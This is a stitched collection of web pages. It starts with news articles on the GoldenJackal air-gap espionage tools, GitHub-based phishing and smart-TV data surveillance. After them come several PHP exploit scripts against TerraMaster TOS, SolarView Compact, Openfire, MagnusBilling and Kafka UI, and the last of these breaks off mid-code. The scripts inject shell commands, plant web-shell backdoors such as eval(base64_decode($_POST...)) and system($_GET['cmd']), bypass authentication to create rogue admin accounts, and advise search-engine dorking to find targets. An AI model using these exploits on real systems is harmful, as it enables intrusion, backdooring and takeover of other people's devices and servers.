It's hard enough creating one air-gap-jumping tool. Researchers say the group GoldenJackal did it twice in five years.

Researchers have unearthed two sophisticated tool sets that a nation-state hacking group—possibly from Russia—used to steal sensitive data stored on air-gapped devices, meaning those that are deliberately isolated from the internet or other networks to safeguard them from malware.

One of the custom tool collections was used starting in 2019 against a South Asian embassy in Belarus. A largely different tool set created by the same threat group infected a European Union government organization three years later. Researchers from ESET, the security firm that discovered the toolkits, said some of the components in both were identical to those fellow security firm Kaspersky described in research published last year and attributed to an unknown group, tracked as GoldenJackal, working for a nation-state. Based on the overlap, ESET has concluded that the same group is behind all the attacks observed by both firms.

**Quite Unusual**

The practice of air gapping is typically reserved for the most sensitive networks or devices connected to them, such as those used in systems for voting, industrial control, manufacturing, and power generation. A host of malware used in espionage hacking over the past 15 years (for instance, here and here) demonstrate that air gapping isn’t a foolproof protection. It nonetheless forces threat groups to expend significant resources that are likely obtainable only by nation-states with superior technical acumen and unlimited budgets. ESET’s discovery puts GoldenJackal in a highly exclusive collection of threat groups.

“With the level of sophistication required, it is quite unusual that in five years, GoldenJackal managed to build and deploy not one but two separate tool sets designed to compromise air-gapped systems,” ESET researcher Matías Porolli wrote in Tuesday’s report. “This speaks to the resourcefulness of the group.”

The evolution of the kit from 2019 and the one from three years later underscores a growing sophistication by GoldenJackal developers. The first generation provided a full suite of capabilities, including:

*   GoldenDealer, a component that delivers malicious executables to air-gapped systems over USB drives
*   GoldenHowl, a backdoor that contains various modules for a mix of malicious capabilities
*   GoldenRobo, a file collector and exfiltrator

Within a few weeks of deploying the kit in 2019, ESET said, GoldenJackal started using other tools on the same compromised devices. The newer tools, which Kaspersky documented in its 2023 research, included:

*   A backdoor tracked under the name JackalControl
*   JackalSteal, a file collector and exfiltrator
*   JackalWorm, used to propagate other JackalControl and other malicious components over USB drives

GoldenJackal, ESET said, continued using these tools into January of this year. The basic flow of the attack is, first, infecting an internet-connected device through a means ESET and Kaspersky have been unable to determine. Next, the infected computer infects any external drives that get inserted. When the infected drive is plugged into an air-gapped system, it collects and stores data of interest. Last, when the drive is inserted into the internet-connected device, the data is transferred to an attacker-controlled server.

**Building a Better Trap**

In the 2022 attack on the European Union governmental organization, GoldenJackal began using a new custom toolkit. Written in multiple programming languages, including Go and Python, the newer version took a much more specialized approach. It assigned different tasks to different types of infected devices and marshaled a much larger array of modules, which could be mixed and matched based on the attacker objects for different infections.

“In the observed attacks, GoldenJackal started to use a highly modular approach, using various components to perform different tasks,” ESET’s Porolli wrote. “Some hosts were abused to exfiltrate files, others were used as local servers to receive and distribute staged files or configuration files, and others were deemed interesting for file collection, for espionage purposes.”

The figure below classifies some of the components specifically:

*   GoldenUsbCopy, which monitors for the insertion of USB drives on air-gapped devices and, when found, copies them to an encrypted container that is stored on disk
*   GoldenUsbGo, which appears to be an updated version of GoldenUSBCopy
*   GoldenAce, a distribution tool for propagating other malicious executables and retrieving files stored on USB drives
*   HTTP server, an HTTP server whose precise function isn’t well understood
*   ​​GoldenBlacklist, which downloads an encrypted archive from a local server, sifts through received email messages for those of interest, and puts them in an archive for some other component to exfiltrate
*   GoldenPyBlacklist, a Python implementation of GoldenBlacklist
*   GoldenMailer, which, when connected to an internet device, exfiltrates files of interest previously stolen from an air-gapped device. The exfiltration occurs by attaching them to emails sent to an attacker-controlled email address
*   GoldenDrive, a separate exfiltration tool that, in contrast to GoldenMailer, uploads files of interest to Google Drive.

The newly discovered toolkit is composed of many different building blocks, written in multiple languages and capabilities. The overall goal appears to be increased flexibility and resiliency in the event one module is detected by the target.

“Their goal is to get hard to obtain data from air-gapped systems and stay under the radar as much as possible,” Costin Raiu, a researcher who worked at Kaspersky at the time it was researching GoldenJackal, wrote in an interview. “Multiple exfiltration mechanisms indicate a very flexible tool kit that can accommodate all sorts of situations. These many tools indicate it’s a highly customizable framework where they deploy exactly what they need as opposed to a multi purpose malware that can do anything.”

Other new insights offered by the ESET research is GoldenJackal’s interest in targets located in Europe. Kaspersky researchers detected the group targeting Middle Eastern countries.

Based on the information that was available to Kaspersky, company researchers couldn’t attribute GoldenJackal to any specific country. ESET has also been unable to definitively identify the country, but it did find one hint that the threat group may have a tie to Turla, a potent hacking group working on behalf of Russia’s FSB intelligence agency. The tie comes in the form of command-and-control protocol in GoldenHowl referred to as transport\_http. The same expression is found in malware known to originate with Turla.

Raiu said the highly modular approach is also reminiscent of Red October, an elaborate espionage platform discovered in 2013 targeting hundreds of diplomatic, governmental, and scientific organizations in at least 39 countries, including the Russian Federation, Iran, and the United States.

While much of Tuesday’s report contains technical analysis that is likely to be too advanced for many people to understand, it provides important new information that furthers insights into malware designed to jump air gaps and the tactics, techniques, and procedures of those who use it. The report will also be useful to people responsible for safeguarding the types of organizations most frequently targeted by nation-state groups.

“I’d say this is mostly interesting for security people working in embassies and government CERTs,” Raiu said. “They need to check for these TTPs and keep an eye on them in the future. If you were previously a victim of Turla or Red October I’d keep an eye on this.”

_This story originally appeared on_ _Ars Technica._

A Mysterious Hacking Group Has 2 New Tools to Steal Data From Air-Gapped Machines

A new tax-themed malware campaign targeting insurance and finance sectors has been observed leveraging GitHub links in phishing email messages as a way to bypass security measures and deliver Remcos RAT, indicating that the method is gaining traction among threat actors.
"In this campaign, legitimate repositories such as the open-source tax filing software, UsTaxes, HMRC, and InlandRevenue were

A new tax-themed malware campaign targeting insurance and finance sectors has been observed leveraging GitHub links in phishing email messages as a way to bypass security measures and deliver Remcos RAT, indicating that the method is gaining traction among threat actors.

"In this campaign, legitimate repositories such as the open-source tax filing software, UsTaxes, HMRC, and InlandRevenue were used instead of unknown, low-star repositories," Cofense researcher Jacob Malimban said.

"Using trusted repositories to deliver malware is relatively new compared to threat actors creating their own malicious GitHub repositories. These malicious GitHub links can be associated with any repository that allows comments."

Central to the attack chain is the abuse of GitHub infrastructure for staging the malicious payloads. One variation of the technique, first disclosed by OALABS Research in March 2024, involves threat actors opening a GitHub issue on well-known repositories and uploading to it a malicious payload, and then closing the issue without saving it.

In doing so, it has been found that the uploaded malware persists even though the issue is never saved, a vector that has become ripe for abuse as it allows attackers to upload any file of their choice and not leave any trace except for the link to the file itself.

The approach has been weaponized to trick users into downloading a Lua-based malware loader that is capable of establishing persistence on infected systems and delivering additional payloads, as detailed by Morphisec this week.

The phishing campaign detected by Cofense employs a similar tactic, the only difference being that it utilizes GitHub comments to attach a file (i.e., the malware), after which the comment is deleted. Like in the aforementioned case, the link remains active and is propagated via phishing emails.

"Emails with links to GitHub are effective at bypassing SEG security because GitHub is typically a trusted domain," Malimban said. "GitHub links allow threat actors to directly link to the malware archive in the email without having to use Google redirects, QR codes, or other SEG bypass techniques."

The development comes as Barracuda Networks revealed novel methods adopted by phishers, including ASCII- and Unicode-based QR codes and blob URLs as a way to make it harder to block malicious content and evade detection.

"A blob URI (also known as a blob URL or an object URL) is used by browsers to represent binary data or file-like objects (called blobs) that are temporarily held in the browser's memory," security researcher Ashitosh Deshnur said.

"Blob URIs allow web developers to work with binary data like images, videos, or files directly within the browser, without having to send or retrieve it from an external server."

It also follows new research from ESET that the threat actors behind the Telekopye Telegram toolkit have expanded their focus beyond online marketplace scams to target accommodation booking platforms such as Booking.com and Airbnb, with a sharp uptick detected in July 2024.

The attacks are characterized by the use of compromised accounts of legitimate hotels and accommodation providers to contact potential targets, claiming purported issues with the booking payment and tricking them into clicking on a bogus link that prompts them to enter their financial information.

"Using their access to these accounts, scammers single out users who recently booked a stay and haven't paid yet – or paid very recently – and contact them via in-platform chat," researchers Jakub Souček and Radek Jizba said. "Depending on the platform and the Mammoth's settings, this leads to the Mammoth receiving an email or SMS from the booking platform."

"This makes the scam much harder to spot, as the information provided is personally relevant to the victims, arrives via the expected communication channel, and the linked, fake websites look as expected."

What's more, the diversification of the victimology footprint has been complemented by improvements to the toolkit that allow the scammer groups to speed up the scam process using automated phishing page generation, improve communication with targets via interactive chatbots, protecting phishing websites against disruption by competitors, and other goals.

Telekopye's operations have not been without their fair share of hiccups. In December 2023, law enforcement officials from Czechia and Ukraine announced the arrest of several cybercriminals who are alleged to have used the malicious Telegram bot.

"Programmers created, updated, maintained and improved the functioning of Telegram bots and phishing tools, as well as ensuring the anonymity of accomplices on the internet and providing advice on concealing criminal activity," the Police of the Czech Republic said in a statement at the time.

"The groups in question were managed, from dedicated workspaces, by middle-aged men from Eastern Europe and West and Central Asia," ESET said. "They recruited people in difficult life situations, through job portal postings promising 'easy money,' as well as by targeting technically skilled foreign students at universities."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

GitHub, Telegram Bots, and QR Codes Abused in New Wave of Phishing Attacks

The Center for Digital Democracy calls on the FTC, the FCC, and California regulators to look at connected TV practices.

Your television is debuting the latest, most captivating program: You.

In a report titled “How TV Watches Us: Commercial Surveillance in the Streaming Era,” the Center for Digital Democracy (CDD) spotlighted a massive data-driven surveillance apparatus that ensnares the public through modern television sets.

> “The widespread technological and business developments that have taken place during the last five years have created a connected television media and marketing system with unprecedented capabilities for surveillance and manipulation.”

In cooperation with data brokers, streaming video programming networks, Connected Television (CTV) device companies, and smart TV manufacturers are creating detailed digital dossiers about viewers, based on a person’s identity information, viewing choices, purchasing patterns, and thousands of online and offline behaviors.

Because of their findings, the CDD has called on the Federal Trade Commission (FTC), the Federal Communications Commission (FCC), and California Regulators to investigate connected TV practices.

The report provides a detailed overview of all the different ways in which streaming services and streaming hardware target viewers in ways that are severe privacy infringements.

Earlier, we read a paper by researchers of the Cornell University about a tracking approach called Automatic Content Recognition (ACR). ACR is a technology that periodically captures the content displayed on a TV’s screen and matches it against a content library to detect what content is being displayed at any given point in time.

The researchers found that ACR is functional even when the smart TV is used as a “dumb” external display. There are two types of ACR fingerprinting: one to process acoustic (ACR audio) media, and one for video content (ACR Video).

Brands utilize ACR TV for multiple reasons. The most obvious are frequency optimization, unique reach abilities, and improved targeting. With the advent of CTV, more and more people are opting out of cable television, which opens the opportunity of more targeted advertising to reach a specific audience.

Free Advertiser-Supported TV (FAST channels) such as Tubi, Pluto TV, and many others are commonplace, and present advertisers with a key opportunity to monetize viewer data and target them with sophisticated new forms of interactive marketing.

CTV has unleashed a powerful arsenal of interactive advertising techniques, including virtual product placement inserted into programming and altered in real time. CTV companies operate cutting-edge advertising technologies that gather, analyze, and then target consumers with ads, delivering them to households in the blink of an eye. These can be hyper targeted advertisements which are personalized for individual viewers.

The report profiles major players in the connected TV industry, along with the wide range of technologies they use to monitor and target viewers. Some household names you might be interested in include:

*   Disney(+)
*   Netflix
*   Amazon
*   Roku
*   Vizio
*   Comcast (NBCU)
*   LG
*   Samsung
*   Google (YouTube)

> “Many of these entities offer misleading and disingenuous ‘privacy policies’ and self-serving descriptions of their systems that fail to explain the complex processes they use to extract data from consumers, track viewing and other behaviors, and facilitate targeted marketing.”

Combine the data these companies are gathering about us with other information that data brokers possess, and you are way past anything we should find acceptable.

Experian offers “over 240 politically relevant audience” segments for sale, based on a detailed set of criteria, including “audience interactions, preferences, demographics, behaviors, location, income and more.”

The US market, which is one of only two that allow direct-to-consumer advertising of pharmaceutical products, is seeing marketers for pharmaceutical products that are heavily invested in connected TV advertising.

Industry research shows that families with young children tend to watch more streaming TV content. Children and teens play a powerful role in determining the viewing patterns of their families, serving as decision-makers when it comes to streaming content. Disney Advertising even calls the cohorts of children, teens and adults viewing its Disney+ and other content “Generation Stream.”

Report co-author Kathryn C. Montgomery, Ph.D. stated:

> “Policy makers, scholars, and advocates need to pay close attention to the changes taking place in today’s 21st century television industry. In addition to calling for strong consumer and privacy safeguards, we should seize this opportunity to re-envision the power and potential of the television medium and to create a policy framework for connected TV that will enable it to do more than serve the needs of advertisers. Our future television system in the United States should support and sustain a healthy news and information sector, promote civic engagement, and enable a diversity of creative expression to flourish.”

**Personal Data Remover**

It may feel like keeping your sensitive data away from data brokers is a losing fight, but there are ways to stop those data brokers from collecting new information and, where possible, to have it deleted from their rosters. For people in the United States, Malwarebytes Personal Data Remover provides:   

*   Immediate, deep scans across roughly 175 databases to find your personal data. 
*   Personalized, in-depth reports on what data is being sold and who is selling it.  
*   Automatic data removal requests for subscribers, which can save 300+ hours of manual work in wiping sensitive details off the internet, along with free DIY guides to tackle each site individually.  
*   Recurring scans and data removal requests that will make it harder for invasive websites to rebuild their digital portraits of you.

 Modern TVs have &#8220;unprecedented capabilities for surveillance and manipulation,&#8221; group reveals 

TerraMaster TOS version 4.2.29 suffers from a remote code injection vulnerability leveraging a local file inclusion vulnerability.

    =============================================================================================================================================| # Title     : TerraMaster TOS 4.2.29 Code Injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.terra-master.com/global/alltos/                                                                                 |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 138 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass TerraMasterExploit{    private $targetUri;    private $data = [];    private $terramaster = [];    public function __construct($targetUri)    {        $this->targetUri = rtrim($targetUri, '/') . '/';    }    public function getData()    {        // Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS`        $response = $this->sendRequest('POST', 'module/api.php?mobile/webNasIPS', ['User-Agent' => 'TNAS']);                if ($response && strpos($response, 'webNasIPS successful') !== false) {            // Parse the JSON response and get the data            $resJson = json_decode($response, true);            if (!empty($resJson['data'])) {                $this->data['password'] = trim(explode('SAT', explode('PWD:', $resJson['data'])[1])[0]);                $this->data['mac'] = trim(explode('"', explode('mac":"', $resJson['data'])[1])[0]);                $this->data['key'] = substr($this->data['mac'], 6, 6); // last three MAC address entries                $this->data['timestamp'] = time();                // derive signature                $this->data['signature'] = $this->tosEncryptStr($this->data['key'], $this->data['timestamp']);            }        }    }    private function tosEncryptStr($key, $strToEncrypt)    {        $id = $key . $strToEncrypt;        return md5($id);    }    public function executeCommand($cmd)    {        // Execute RCE using vulnerable endpoint `api.php?mobile/createRaid`        $diskstring = $this->generateRandomString(4, 8);        $headers = [            'User-Agent' => 'TNAS',            'Authorization' => $this->data['password'],            'Signature' => $this->data['signature'],            'Timestamp' => $this->data['timestamp']        ];        $this->sendRequest('POST', 'module/api.php?mobile/createRaid', [            'raidtype' => ';' . $cmd,            'diskstring' => $diskstring        ], $headers);    }    public function getTerramasterInfo()    {        // get Terramaster CPU architecture and TOS version        $response = $this->sendRequest('GET', 'tos/index.php?user/login');        if ($response) {            preg_match('/ver=.+?"/', $response, $matches);            if ($matches) {                $version = $matches[0];                // check if architecture is ARM64 or X64                if (strpos($version, '_A') !== false) {                    $this->terramaster['cpu_arch'] = 'ARM64';                } elseif (strpos($version, '_S') !== false || strpos($version, '_Q') !== false) {                    $this->terramaster['cpu_arch'] = 'X64';                } else {                    $this->terramaster['cpu_arch'] = 'UNKNOWN';                }                // strip TOS version number and remove trailing double quote.                $this->terramaster['tos_version'] = rtrim(substr($version, strpos($version, '.0_') + 3), '"');            }        }    }    public function check()    {        $this->getTerramasterInfo();        if (empty($this->terramaster)) {            return 'Safe';        }        if (version_compare($this->terramaster['tos_version'], '4.2.29', '<=') === 0) {            return "Vulnerable: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";        }        return "Safe: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";    }    public function exploit()    {        $this->getData();        if (empty($this->data)) {            throw new Exception('Cannot retrieve the leaked data.');        }        echo "Executing exploit...\n";        // Example command to execute        $this->executeCommand('whoami'); // Replace 'whoami' with desired command    }    private function sendRequest($method, $uri, $data = [], $headers = [])    {        $url = $this->targetUri . $uri;        $options = [            CURLOPT_RETURNTRANSFER => true,            CURLOPT_CUSTOMREQUEST => strtoupper($method),            CURLOPT_HTTPHEADER => array_merge(['Content-Type: application/x-www-form-urlencoded'], $headers)        ];        if (strtoupper($method) === 'POST') {            $options[CURLOPT_POSTFIELDS] = http_build_query($data);        } else {            $options[CURLOPT_URL] = $url;        }        $ch = curl_init();        curl_setopt_array($ch, $options);        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    private function generateRandomString($minLength, $maxLength)    {        $length = rand($minLength, $maxLength);        return substr(str_shuffle(str_repeat("ABCDEFGHIJKLMNOPQRSTUVWXYZ", $maxLength)), 0, $length);    }}// Usage$exploit = new TerraMasterExploit('http://target-terramaster-url.com');$check = $exploit->check();echo $check . "\n";if (strpos($check, 'Vulnerable') !== false) {    $exploit->exploit();}Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

TerraMaster TOS 4.2.29 Code Injection / Local File Inclusion

SolarView Compact version 6.00 suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : SolarView Compact 6.00 Code Injection Vulnerability                                                                         |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.contec.com/                                                                                                     |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 112 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class SolarViewExploit {  
    private $targetUri;  
    private $webshellName;  
    private $postParam;  
    private $timeout;

    public function __construct($targetUri, $timeout = 40) {  
        $this->targetUri = rtrim($targetUri, '/');  
        $this->timeout = $timeout;  
    }

    public function uploadWebshell($webshell = null) {  
        // Randomize file name if option WEBSHELL is not set  
        $this->webshellName = $webshell ?? $this->generateRandomFileName();

        $this->postParam = $this->generateRandomString(8);

                // Inject PHP payload into the PLTE chunk of a PNG image to hide the payload  
        $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";  
        $pngWebshell = $this->injectPhpPayloadPng($phpPayload);

        if ($pngWebshell === null) {  
            return null;  
        }

        // Encode webshell data and write to file on the target at the tmp directory for execution  
        $payload = base64_encode($pngWebshell);  
        $cmd = "echo {$payload}|base64 -d >tmp/{$this->webshellName}";  
        return $this->executeCommand($cmd);  
    }

    public function executePhp($cmd) {  
        $payload = base64_encode($cmd);  
        return $this->sendRequest('POST', "/tmp/{$this->webshellName}", [  
            $this->postParam => $payload  
        ]);  
    }

    public function executeCommand($cmd) {  
        // Encode payload with base64 to ensure proper execution  
        $payload = base64_encode($cmd);  
        $cmd = "echo {$payload}|base64 -d|bash";  
        return $this->sendRequest('GET', '/downloader.php', [  
            'file' => ";{$cmd};.zip"  
        ]);  
    }

    public function check() {  
        // Checking if the target is vulnerable by echoing a randomised marker  
        echo "Checking if {$this->targetUri} can be exploited.\n";  
        $marker = $this->generateRandomString(16);  
        $res = $this->executeCommand("echo {$marker};cat /opt/svc/version");

        if ($res && $res['code'] == 200 && strpos($res['body'], $marker) !== false) {  
            if (preg_match('/SolarView Compact ver\.\d\.\d\d/', $res['body'], $matches)) {  
                return "Vulnerable: " . $matches[0];  
            }  
        }  
        return 'Safe: No valid response received from the target.';  
    }

    public function exploit($payload) {  
        echo "Executing payload on {$this->targetUri}.\n";  
        $res = $this->uploadWebshell();

        if (!$res || $res['code'] !== 200) {  
            throw new Exception('Web shell upload error.');  
        }

        $this->executePhp($payload);  
    }

    private function sendRequest($method, $uri, $params) {  
        $url = $this->targetUri . $uri;  
        $options = [  
            'http' => [  
                'method' => $method,  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'timeout' => $this->timeout,  
                'content' => http_build_query($params)  
            ]  
        ];

        $context = stream_context_create($options);  
        $response = @file_get_contents($url, false, $context);  
        $code = isset($http_response_header[0]) ? intval(substr($http_response_header[0], 9, 3)) : 0;

        return [  
            'code' => $code,  
            'body' => $response  
        ];  
    }

    private function injectPhpPayloadPng($phpPayload) {  
        // Here you would implement the logic to inject the PHP payload into a PNG file.  
        // This is a placeholder implementation.  
        return $phpPayload; // Modify this to return the actual PNG with embedded PHP payload.  
    }

    private function generateRandomFileName($length = 16) {  
        return bin2hex(random_bytes($length / 2)) . '.php';  
    }

    private function generateRandomString($length) {  
        return bin2hex(random_bytes($length / 2));  
    }  
}

// Example of usage  
$targetUri = 'http://target-ip'; // Replace with the actual target URL  
$exploit = new SolarViewExploit($targetUri);  
echo $exploit->check();  
$exploit->exploit('whoami'); // Replace with your payload

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

SolarView Compact 6.00 Code Injection

Openfire version 4.8.0 suffers from authentication bypass and code injection vulnerabilities.

    =============================================================================================================================================| # Title     : Openfire release 4.8.0 Code Injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.igniterealtime.org/projects/openfire/                                                                           |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 115 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass OpenfireExploit{    private $targetUrl;    private $adminUsername;    private $adminPassword;    private $pluginName;    private $csrfToken;    public function __construct($targetUrl, $adminUsername = null, $adminPassword = null, $pluginName = null)    {        $this->targetUrl = rtrim($targetUrl, '/') . '/';        $this->adminUsername = $adminUsername ?? $this->generateRandomString(8, 15);        $this->adminPassword = $adminPassword ?? $this->generateRandomPassword(8, 10);        $this->pluginName = $pluginName ?? $this->generateRandomString(8, 15);    }    private function generateRandomString($minLength, $maxLength)    {        $length = rand($minLength, $maxLength);        return substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length);    }    private function generateRandomPassword($minLength, $maxLength)    {        return bin2hex(random_bytes(rand($minLength, $maxLength) / 2));    }    private function sendRequest($method, $uri, $data = null, $headers = [])    {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $this->targetUrl . $uri);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        return curl_exec($ch);    }    private function getCsrfToken()    {        $response = $this->sendRequest('GET', 'login.jsp');        preg_match('/csrf=([^;]+)/', $response, $matches);        return $matches[1] ?? null;    }    private function authBypass()    {        $this->sendRequest('GET', 'setup/setup-s/../../../../user-groups.jsp');        // Check if we can access the user-groups.jsp page        return $this->sendRequest('GET', 'setup/setup-s/../../../../user-groups.jsp') !== false;    }    private function addAdminUser()    {        $this->csrfToken = $this->getCsrfToken();        $data = http_build_query([            'csrf' => $this->csrfToken,            'username' => $this->adminUsername,            'password' => $this->adminPassword,            'passwordConfirm' => $this->adminPassword,            'isadmin' => 'on',            'create' => 'Create User'        ]);        return $this->sendRequest('POST', 'setup/setup-s/../../../../user-create.jsp', $data);    }    private function uploadPlugin($pluginFilePath)    {        $this->csrfToken = $this->getCsrfToken();        $cfile = new CURLFile($pluginFilePath);        $data = [            'uploadfile' => $cfile,            'csrf' => $this->csrfToken        ];        $headers = ['Content-Type: multipart/form-data'];        return $this->sendRequest('POST', 'plugin-admin.jsp', $data, $headers);    }    public function exploit()    {        if ($this->authBypass()) {            echo "Authentication bypass successful.\n";            if ($this->addAdminUser()) {                echo "Admin user '{$this->adminUsername}' added successfully.\n";                // Prepare plugin JAR file path                $pluginJarPath = '/path/to/plugin.jar'; // Replace with actual path to the JAR file                if ($this->uploadPlugin($pluginJarPath)) {                    echo "Plugin uploaded successfully.\n";                } else {                    echo "Failed to upload plugin.\n";                }            } else {                echo "Failed to add admin user.\n";            }        } else {            echo "Authentication bypass failed.\n";        }    }}// Usage$exploit = new OpenfireExploit('http://target-openfire-url.com');$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Openfire 4.8.0 Code Injection

MagnusBilling version 6.x suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : MagnusBilling 6.x Code Injection Vulnerability                                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.magnusbilling.org/                                                                                              |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 83 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class MagnusBillingExploit {  
    private $targetUri;  
    private $webShellName;

    public function __construct($targetUri) {  
        $this->targetUri = $targetUri;  
    }

    // Function to execute commands on the target  
    public function executeCommand($cmd) {  
        $url = $this->targetUri . '/lib/icepay/icepay.php?democ=/dev/null;' . $cmd . ';#';  
        return file_get_contents($url); // Send HTTP request  
    }

    // Function to execute PHP code on the target  
    public function executePhp($cmd) {  
        $payload = base64_encode($cmd);  
        $url = $this->targetUri . '/lib/icepay/' . $this->webShellName;  
        $postFields = [$this->postParam => $payload];  
        return $this->sendPostRequest($url, $postFields); // Send POST request  
    }

    // Upload backdoor webshell to the target  
    public function uploadBackdoorWebShell() {  
        // Name of the webshell to be uploaded  
        $this->webShellName = "backdoor.php"; // Set a specific name for the backdoor file

        // Backdoor PHP code (this allows execution of commands passed through a GET parameter 'cmd')  
        $backdoorCode = "<?php if(isset(\$_GET['cmd'])){system(\$_GET['cmd']);} ?>";

        // Encode the webshell content  
        $encodedPayload = base64_encode($backdoorCode);

        // Construct the command to upload the backdoor  
        $cmd = "echo {$encodedPayload} | base64 -d > ./{$this->webShellName}";

        // Execute the command to upload the backdoor  
        return $this->executeCommand($cmd);  
    }

    // Check if the target can be exploited  
    public function check() {  
        $url = $this->targetUri;  
        $response = file_get_contents($url);  
        if (!$response || !preg_match('/MagnusBilling/i', $response)) {  
            return "Safe: Likely not a MagnusBilling application.";  
        }

        $sleepTime = rand(4, 8);  
        $this->executeCommand("sleep {$sleepTime}");  
        sleep($sleepTime); // Simulate blind command injection

        return "Vulnerable: Command injection successful.";  
    }

    // Main function to exploit the target  
    public function exploit() {  
        echo "Uploading backdoor...\n";  
        $result = $this->uploadBackdoorWebShell();  
        if (!$result) {  
            die("Backdoor upload failed.");  
        }  
        echo "Backdoor uploaded at: {$this->targetUri}/lib/icepay/{$this->webShellName}\n";  
    }

    // Helper function to send POST requests  
    private function sendPostRequest($url, $postFields) {  
        $options = [  
            'http' => [  
                'method' => 'POST',  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'content' => http_build_query($postFields)  
            ]  
        ];  
        $context = stream_context_create($options);  
        return file_get_contents($url, false, $context);  
    }  
}

// Usage example  
$exploit = new MagnusBillingExploit('http://target-url/mbilling');  
$exploit->exploit();

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

MagnusBilling 6.x Code Injection 

Kafka UI version 0.7.1 suffers from a remote code injection vulnerability.

    =============================================================================================================================================| # Title     : Kafka UI 0.7.1 Code Injection Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://github.com/provectus/kafka-ui/                                                                                      |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 159 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass KafkaUIExploit {    private $target;    private $version;    private $cluster;    private $new_topic;    public function __construct($target) {        $this->target = $target;    }    public function vuln_version() {        $uri = $this->normalize_uri('/actuator/info');        $response = $this->send_request('GET', $uri, 'application/json');        if ($response && $response['status_code'] == 200) {            $json_response = json_decode($response['body'], true);            if (!empty($json_response)) {                if (isset($json_response['build']['version'])) {                    $this->version = ltrim($json_response['build']['version'], 'v');                } elseif (isset($json_response['git']['commit']['id'])) {                    // Git commit versioning (this part should check with a local list if needed)                    $git_commit_id = substr($json_response['git']['commit']['id'], 0, 7);                    // Implement logic to map git commit to version                }                return version_compare($this->version, '0.7.1', '<=') && version_compare($this->version, '0.4.0', '>=');            }        }        return false;    }    public function get_cluster() {        $uri = $this->normalize_uri('/api/clusters');        $response = $this->send_request('GET', $uri, 'application/json');        if ($response && $response['status_code'] == 200) {            $json_response = json_decode($response['body'], true);            foreach ($json_response as $cluster) {                if ($cluster['status'] == 'online' || $cluster['topicCount'] > 0) {                    return $cluster['name'];                }            }        }        return null;    }    public function create_topic($cluster) {        $topic_name = $this->random_string(8);        $post_data = json_encode([            'name' => $topic_name,            'partitions' => 1,            'replicationFactor' => 1,            'configs' => [                'cleanup.policy' => 'delete',                'retention.bytes' => '-1'            ]        ]);        $uri = $this->normalize_uri("/api/clusters/$cluster/topics");        $response = $this->send_request('POST', $uri, 'application/json', $post_data);        if ($response && $response['status_code'] == 200) {            $json_response = json_decode($response['body'], true);            return $json_response['name'];        }        return null;    }    public function delete_topic($cluster, $topic) {        $uri = $this->normalize_uri("/api/clusters/$cluster/topics/$topic");        $response = $this->send_request('DELETE', $uri, 'application/json');        return $response['status_code'] == 200;    }    public function produce_message($cluster, $topic) {        $post_data = json_encode([            'partition' => 0,            'key' => 'null',            'content' => 'null',            'keySerde' => 'String',            'valueSerde' => 'String'        ]);        $uri = 